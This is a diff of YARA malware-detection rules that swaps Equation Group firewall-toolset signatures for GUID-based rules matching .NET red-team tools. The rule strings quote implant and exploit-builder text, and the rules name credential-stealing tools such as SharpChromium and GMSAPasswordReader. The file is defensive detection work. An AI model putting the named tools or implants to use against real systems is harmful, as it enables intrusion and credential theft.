 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4a50ec4bf42087e932e9e67e0ea4c09e52a475d351981bb4c9851fda02b35291"
 
 	strings:
-		$s1 = "Generates the persistence file name and prints it out." fullword ascii
+		$typelibguid0lo = "22a156ea-2623-45c7-8e50-e864d9fc44d3" ascii wide
+		$typelibguid0up = "22A156EA-2623-45C7-8E50-E864D9FC44D3" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Create_Dns_Injection
+rule SIGNATURE_BASE_HKTL_NET_GUID_Farmer : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file create_dns_injection.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ef358ca6-ebd8-5d08-944b-f1fcd112f1f3"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L252-L266"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f69745b9-4ebd-547a-9af3-bc340b076e5d"
+		date = "2023-03-22"
+		modified = "2023-04-06"
+		reference = "https://github.com/mdsecactivebreach/Farmer"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5330-L5350"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a07cb33c459208410b326fc260e96e617385ee4eac905a92d9542cb5ec73713e"
+		logic_hash = "9f4c2cc503e8fd5b310f2c4b7d5914857612dab1435ca886bc7f8f362e822832"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "488f3cc21db0688d09e13eb85a197a1d37902612c3e302132c84e07bc42b1c32"
 
 	strings:
-		$s1 = "Name:   A hostname: 'host.network.com', a decimal numeric offset within" fullword ascii
-		$s2 = " www.badguy.net,CNAME,1800,host.badguy.net \\\\" ascii
+		$typelibguid0lo = "37da2573-d9b5-4fc2-ae11-ccb6130cea9f" ascii wide
+		$typelibguid0up = "37DA2573-D9B5-4FC2-AE11-CCB6130CEA9F" ascii wide
+		$typelibguid1lo = "49acf861-1c10-49a1-bf26-139a3b3a9227" ascii wide
+		$typelibguid1up = "49ACF861-1C10-49A1-BF26-139A3B3A9227" ascii wide
+		$typelibguid2lo = "9a6c028f-423f-4c2c-8db3-b3499139b822" ascii wide
+		$typelibguid2up = "9A6C028F-423F-4C2C-8DB3-B3499139B822" ascii wide
+		$typelibguid3lo = "1c896837-e729-46a9-92b9-3bbe7ac2c90d" ascii wide
+		$typelibguid3up = "1C896837-E729-46A9-92B9-3BBE7AC2C90D" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Screamingplow
+rule SIGNATURE_BASE_HKTL_NET_GUID_Aesshellcodeinjector : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file screamingplow.sh"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cb535ef0-e3ea-54cc-9082-3d63cc96d93a"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L268-L282"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "6253e30b-7c92-5237-a706-e93403a7c0b6"
+		date = "2023-03-22"
+		modified = "2023-04-06"
+		reference = "https://github.com/san3ncrypt3d/AESShellCodeInjector"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5352-L5366"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "429ff81b6079785cc45d81b5ebf8bccd49f30484ca692017b0b66484463606d4"
+		logic_hash = "a3a6793e5ba5788fb01b3a04dc287d0bad44c87c72da302e5629d59a35ee1583"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c7f4104c4607a03a1d27c832e1ebfc6ab252a27a1709015b5f1617b534f0090a"
 
 	strings:
-		$s1 = "What is the name of your PBD:" fullword ascii
-		$s2 = "You are now ready for a ScreamPlow" fullword ascii
+		$typelibguid0lo = "b016da9e-12a1-4f1d-91a1-d681ae54e92c" ascii wide
+		$typelibguid0up = "B016DA9E-12A1-4F1D-91A1-D681AE54E92C" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Mixtext
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpchromium : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file MixText.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "99b06100-8a05-5c22-8b7d-ed451d5f4e81"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L284-L297"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5364956a-e199-556a-8055-0e7b9a7b14c8"
+		date = "2023-03-22"
+		modified = "2023-04-06"
+		reference = "https://github.com/djhohnstein/SharpChromium"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5368-L5382"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cae2437124ad6e69b04a1338b651e33c7358b7fedd0613f3fa1025cf980e14ab"
+		logic_hash = "00324bac8e8d9c335a359c2241e810d2e345ee6fb10a63b1bc05f33a7816c80d"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e4d24e30e6cc3a0aa0032dbbd2b68c60bac216bef524eaf56296430aa05b3795"
 
 	strings:
-		$s1 = "BinStore enabled implants." fullword ascii
+		$typelibguid0lo = "2133c634-4139-466e-8983-9a23ec99e01b" ascii wide
+		$typelibguid0up = "2133C634-4139-466E-8983-9A23EC99E01B" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Tunnel_State_Reader
+rule SIGNATURE_BASE_HKTL_NET_GUID_Get_RBCD_Threaded : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file tunnel_state_reader"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e48c9482-eae5-5c34-b7b2-502d0252f4a0"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L299-L313"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "fdef6dc3-da1a-5a98-a822-94e443981fdd"
+		date = "2023-03-22"
+		modified = "2023-04-06"
+		reference = "https://github.com/FatRodzianko/Get-RBCD-Threaded"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5384-L5398"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d0653650aad10e7ff69b7ef1e61fac64310c63cc68c6d924655f082925e4fd04"
+		logic_hash = "c771f3cf70901b6e60ec5a721e214e7c6c95169070d071caa870ca9f6235519f"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "49d48ca1ec741f462fde80da68b64dfa5090855647520d29e345ef563113616c"
 
 	strings:
-		$s1 = "Active connections will be maintained for this tunnel. Timeout:" fullword ascii
-		$s5 = "%s: compatible with BLATSTING version 1.2" fullword ascii
+		$typelibguid0lo = "e20dc2ed-6455-4101-9d78-fccac1cb7a18" ascii wide
+		$typelibguid0up = "E20DC2ED-6455-4101-9D78-FCCAC1CB7A18" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Payload
+rule SIGNATURE_BASE_HKTL_NET_GUID_Whisker : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file payload.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "949cb68b-e384-578c-a906-a4d9234dc668"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L315-L329"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ecb0c59f-2111-58d9-8dc9-dfe005cad3be"
+		date = "2023-03-22"
+		modified = "2023-04-06"
+		reference = "https://github.com/eladshamir/Whisker"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5400-L5414"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "22e2a4809f6646437ab0824238fec791f3760ac305f9c818089797b011425b3d"
+		logic_hash = "937998140d3487e7d490be50525ab6d42309e2198d3d2afe4e3c73ad14517b57"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "21bed6d699b1fbde74cbcec93575c9694d5bea832cd191f59eb3e4140e5c5e07"
 
 	strings:
-		$s1 = "can't find target version module!" fullword ascii
-		$s2 = "class Payload:" fullword ascii
+		$typelibguid0lo = "42750ac0-1bff-4f25-8c9d-9af144403bad" ascii wide
+		$typelibguid0up = "42750AC0-1BFF-4F25-8C9D-9AF144403BAD" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Eligiblecandidate
+rule SIGNATURE_BASE_HKTL_NET_GUID_Shadowspray : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file eligiblecandidate.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e084b051-4aa1-54b2-9f56-69db386b46d6"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L331-L348"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "91dd52ef-07a1-5ffd-b5c3-59bca18d4c7c"
+		date = "2023-03-22"
+		modified = "2023-04-06"
+		reference = "https://github.com/Dec0ne/ShadowSpray"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5416-L5430"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e7e1b206f9c51ffe0ab016a93d551a9ede8f87adfc38fe70278be8c2f0fe0696"
+		logic_hash = "1d5992f9f58b6f7254fd8436aa32c6744d7a7ac3c70d94b3d7325c7a4c720475"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c4567c00734dedf1c875ecbbd56c1561a1610bedb4621d9c8899acec57353d86"
 
 	strings:
-		$o1 = "Connection timed out. Only a problem if the callback was not received." fullword ascii
-		$o2 = "Could not reliably detect cookie. Using 'session_id'..." fullword ascii
-		$c1 = "def build_exploit_payload(self,cmd=\"/tmp/httpd\"):" fullword ascii
-		$c2 = "self.build_exploit_payload(cmd)" fullword ascii
+		$typelibguid0lo = "7e47d586-ddc6-4382-848c-5cf0798084e1" ascii wide
+		$typelibguid0up = "7E47D586-DDC6-4382-848C-5CF0798084E1" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_BUSURPER_2211_724
+rule SIGNATURE_BASE_HKTL_NET_GUID_Malsccm : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BUSURPER-2211-724.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d109210e-14df-5b90-a496-fa8a2454126b"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L350-L367"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4a88532b-e2bc-5ce9-828d-6ef62d91f6b9"
+		date = "2023-03-22"
+		modified = "2023-04-06"
+		reference = "https://github.com/nettitude/MalSCCM"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5432-L5446"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "834180ef512882cc3b22e79a6bda349678eb5042a3356a50c47eeb36ae453427"
+		logic_hash = "429da06c863b73263f6de7acba0e8479cc2ad45af45d85ce846fce6f7e0b3b64"
 		score = 75
-		quality = 83
-		tags = ""
+		quality = 85
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d809d6ff23a9eee53d2132d2c13a9ac5d0cb3037c60e229373fc59a4f14bc744"
 
 	strings:
-		$s1 = ".got_loader" fullword ascii
-		$s2 = "_start_text" ascii
-		$s3 = "IMPLANT" fullword ascii
-		$s4 = "KEEPGOING" fullword ascii
-		$s5 = "upgrade_implant" fullword ascii
+		$typelibguid0lo = "5439cecd-3bb3-4807-b33f-e4c299b71ca2" ascii wide
+		$typelibguid0up = "5439CECD-3BB3-4807-B33F-E4C299B71CA2" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Networkprofiler_Orderscans
+rule SIGNATURE_BASE_HKTL_NET_GUID_Spoolsample : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file networkProfiler_orderScans.sh"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2d48df0c-f950-5bb6-8d3e-77c2f970eb57"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L369-L383"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "38346575-cf5b-59bf-b2b2-21aacf05b8a4"
+		date = "2023-03-22"
+		modified = "2023-04-06"
+		reference = "https://github.com/leechristensen/SpoolSample"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5448-L5462"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0cdf4f3d8f668ce5d5aab652c83cb4d2a9acc3471ff720448d021707b34402ef"
+		logic_hash = "a57e5675d8e24a7288d070f8e764c5253797bf7ed3e4b1a3fba0a6e1777317e9"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ea986ddee09352f342ac160e805312e3a901e58d2beddf79cd421443ba8c9898"
 
 	strings:
-		$x1 = "Unable to save off predefinedScans directory" fullword ascii
-		$x2 = "Re-orders the networkProfiler scans so they show up in order in the LP" fullword ascii
+		$typelibguid0lo = "640c36b4-f417-4d85-b031-83a9d23c140b" ascii wide
+		$typelibguid0up = "640C36B4-F417-4D85-B031-83A9D23C140B" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Epicbanana_2_1_0_1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpoxidresolver : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file epicbanana_2.1.0.1.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cc3346bd-0347-5cf3-b946-5c017d68d93e"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L385-L399"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e8a957bc-3319-51c2-8289-01bd0b8a632a"
+		date = "2023-03-22"
+		modified = "2023-04-06"
+		reference = "https://github.com/S3cur3Th1sSh1t/SharpOxidResolver"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5464-L5478"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "be0b180e0dfdda35725ac6d9c35752a0b56bdbdaf985b6932c7d2ff342d4cde3"
+		logic_hash = "809ee7d9063700dbea2d33d01e4fb6b58ca9360fb6705f05eadb78fa0a2b2fb2"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4b13cc183c3aaa8af43ef3721e254b54296c8089a0cd545ee3b867419bb66f61"
 
 	strings:
-		$s1 = "failed to create version-specific payload" fullword ascii
-		$s2 = "(are you sure you did \"make [version]\" in versions?)" fullword ascii
+		$typelibguid0lo = "ce59f8ff-0ecf-41e9-a1fd-1776ca0b703d" ascii wide
+		$typelibguid0up = "CE59F8FF-0ECF-41E9-A1FD-1776CA0B703D" ascii wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Sniffer_Xml2Pcap
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcat : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file sniffer_xml2pcap"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c284ac58-923c-5c34-b420-e87797915233"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L401-L415"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "450d13c6-93ae-5bf5-bdde-d874ab6c0cd5"
+		date = "2023-11-30"
+		modified = "2024-04-24"
+		reference = "https://github.com/theart42/Sharpcat"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5480-L5492"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3c3aa9f42edbca32725f8c02023e3b9644162a001ded099513d12f94d70dd4c8"
+		logic_hash = "143757610d66c5d7bbba96ef810d518f38ad8ea0e924be23aa59e8c514154fe0"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 83
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f5e5d75cfcd86e5c94b0e6f21bbac886c7e540698b1556d88a83cc58165b8e42"
 
 	strings:
-		$x1 = "-s/--srcip <sourceIP>  Use given source IP (if sniffer doesn't collect source IP)" fullword ascii
-		$x2 = "convert an XML file generated by the BLATSTING sniffer module into a pcap capture file." fullword ascii
+		$typelibguid0 = "d16fd95f-23ce-4f8d-8763-b9f5a9cdd0c3" ascii nocase wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Bananaaid
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpnamedpipepth : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BananaAid"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bdd3ce51-1809-5b2f-9c7e-6c0b056d022b"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L417-L433"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "561b95a5-f32b-5fe8-9e67-3f702306be93"
+		date = "2023-11-30"
+		modified = "2024-04-24"
+		reference = "https://github.com/S3cur3Th1sSh1t/SharpNamedPipePTH"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5494-L5506"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2ae52529547866dcfe66fffb3f5b37eba89844b7675129c66636ebef01b0f49a"
+		logic_hash = "437a8a41073174e86f642717537bdeeb5343cc8683c95477a52d6801a46aac21"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 83
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7a4fb825e63dc612de81bc83313acf5eccaa7285afc05941ac1fef199279519f"
 
 	strings:
-		$x1 = "(might have to delete key in ~/.ssh/known_hosts on linux box)" fullword ascii
-		$x2 = "scp BGLEE-" ascii
-		$x3 = "should be 4bfe94b1 for clean bootloader version 3.0; " fullword ascii
-		$x4 = "scp <configured implant> <username>@<IPaddr>:onfig" fullword ascii
+		$typelibguid0 = "344ee55a-4e32-46f2-a003-69ad52b55945" ascii nocase wide
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Bo : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharptokenfinder : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file bo"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6aa71528-3ce6-5597-bb1a-e44cff3856d6"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L435-L452"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "60fd06be-041b-5fa8-8f25-41b26605ea90"
+		date = "2023-12-06"
+		modified = "2024-04-24"
+		reference = "https://github.com/HuskyHacks/SharpTokenFinder"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5508-L5520"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "48c2d3f13283d2a1b7e1010c724f1e68e6002dd9a9779025dfc3a4952bec95bc"
+		logic_hash = "f9681a13b094b6e05cab69f0684d52e3bb3b465cfcdb1c83a890c9c8fda79169"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "aa8b363073e8ae754b1836c30f440d7619890ded92fb5b97c73294b15d22441d"
 
 	strings:
-		$s1 = "ERROR: failed to open %s: %d" fullword ascii
-		$s2 = "__libc_start_main@@GLIBC_2.0" ascii
-		$s3 = "serial number: %s" fullword ascii
-		$s4 = "strerror@@GLIBC_2.0" fullword ascii
-		$s5 = "ERROR: mmap failed: %d" fullword ascii
+		$typelibguid0 = "572804d3-dbd6-450a-be64-2e3cb54fd173" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 20KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Seconddate_2211 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharprodc : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file SecondDate-2211.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "00951270-6189-58b6-8b64-422c4ab15ebe"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L454-L470"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "60779e7a-048f-5095-b853-fd90c4f7449e"
+		date = "2023-12-06"
+		modified = "2024-04-24"
+		reference = "https://github.com/wh0amitz/SharpRODC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5522-L5534"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f51f4cfb3b1c77f03a3627cccfee72e57731b26b01907cc837f246a8f7677580"
+		logic_hash = "3d24237804509d2bf241f7310843591608a9d7e8abb38eb324aa5909995ebfaf"
 		score = 75
 		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2337d0c81474d03a02c404cada699cf1b86c3c248ea808d4045b86305daa2607"
 
 	strings:
-		$s1 = "SD_processControlPacket" fullword ascii
-		$s2 = "Encryption_rc4SetKey" fullword ascii
-		$s3 = ".got_loader" fullword ascii
-		$s4 = "^GET.*(?:/ |\\.(?:htm|asp|php)).*\\r\\n" fullword ascii
+		$typelibguid0 = "d305f8a3-019a-4cdf-909c-069d5b483613" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 200KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_EQGRP_Config_Jp1_UA
+rule SIGNATURE_BASE_HKTL_NET_GUID_Gmsapasswordreader : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file config_jp1_UA.pl"
-		author = "Florian Roth (Nextron Systems)"
-		id = "947e6f90-4eb4-5241-9819-677cee0c15d8"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L472-L488"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "dc74bfce-90a1-53bd-bfe4-cb7c9c75da53"
+		date = "2023-12-06"
+		modified = "2024-04-24"
+		reference = "https://github.com/rvazarkar/GMSAPasswordReader"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L5536-L5548"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8dd504bd00f72b1500375fbe451f5abb055cb2ff440f6ae4314b1e3d64097b83"
+		logic_hash = "8db260b15b8b8158e5f66268b9086b456386af017e4351025ea27b9f994e5bf5"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 83
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
